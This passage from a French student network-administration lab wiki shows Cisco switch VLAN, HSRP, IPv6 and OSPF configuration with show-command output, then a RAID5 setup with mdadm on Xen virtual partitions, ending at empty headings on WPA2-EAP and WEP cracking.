 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Vérifications du fonctionnement ====&lt;br /&gt;
&lt;br /&gt;
===== show running-config =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
===== Show Interface status =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
===== IPv6 =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
===== IPv4 =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
===Sécurisation des données via RAID5===&lt;br /&gt;
====Les partitions====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
====Création du RAID====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
===Sécurisation Wifi par WPA2-EAP===&lt;br /&gt;
&lt;br /&gt;
Suite à une erreur de manipulation le /var est mort&lt;br /&gt;
&lt;br /&gt;
Pour réaliser la suite du TP j'ai recrée une VM Dionysos2, même addresse IP.&lt;br /&gt;
&lt;br /&gt;
Il faut donc éteindre la VM Dionysos pour éviter tout problème&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Crack WEP===&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	</feed>